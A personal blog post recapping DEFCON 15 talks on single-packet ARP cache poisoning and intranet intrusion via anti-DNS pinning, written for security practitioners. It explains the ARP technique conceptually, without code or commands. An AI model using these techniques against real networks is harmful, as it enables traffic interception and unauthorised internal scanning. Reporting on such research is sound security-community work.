The third day of DEFCON is always a slow day, at least for me. Many people party their asses off Saturday night only to either stumble into the early morning sessions half drunk or just not show up at all. As for me, neither scenario held. I was only interested in two talks both which turned out to be excellent!

First up for me was Jesse D’Aguanno’s “LAN Protocol Attack – ARP Reloaded.” He began by reviewing the traditional ways to perform ARP cache poisoning and the weaknesses with those techniques in today’s LAN environments. He detailed both client cache limitations as well as CAM (Content-Addressable Memory) tables.

The technique is rather trivial once explained. In the past, most people sent gratuitous ARP replies to the target or broadcast address on a network. The attacker had to keep up this ARP flood in order to pull off the attack. However, Jesse noticed from reading the ARP RFC that if a target receives a request for it’s IP address from an attacker, the target automatically adds the attacker’s IP/MAC address pair to it’s ARP cache. The beauty is that the attack now takes place with a single packet! Genius!! Simple and written in black and white, but genius! I always felt that if more people took the time to actually read RFCs (yawn!) then more tricks like this could be found. I like this.

The second talk was “Intranet Invasion with Anti-DNS Pinning” by David Byrne. For some background on DNS Pinning, go here and here. The talk was great because not only did David confirm all I’ve read on the net about this technique, but he also demonstrated actual attacks live. He was able to trick a victim into loading and running some Javascript that eventually allowed the attacker to run a Nessus scan on the internal network from an outside location. This holds extreme potential for some serious intranet attacks from the outside world.

Every year my goal is to come away from DEFCON with just one new technique that I can play with and improve upon. This year I was fortunate to find at least three: (1) the use of SMB/CIFS and WPAD to gain access to targets without needing an exploit, (2) the ability to perform ARP poisoning in a stealthy manner and (3) the ability to infiltrate an intranet from the outside using anti-DNS pinning techniques.

In addition to the technical gems found, I feel the information gleaned from the two panel discussions, “Meet the VCs” and “Self-Publishing in the Underground,” will help me with my own professional and career development plans. Overall, DEFCON 15 turned out to be better than I had hoped. Now maybe I can go out and enjoy Vegas before my 7:00 am flight tomorrow!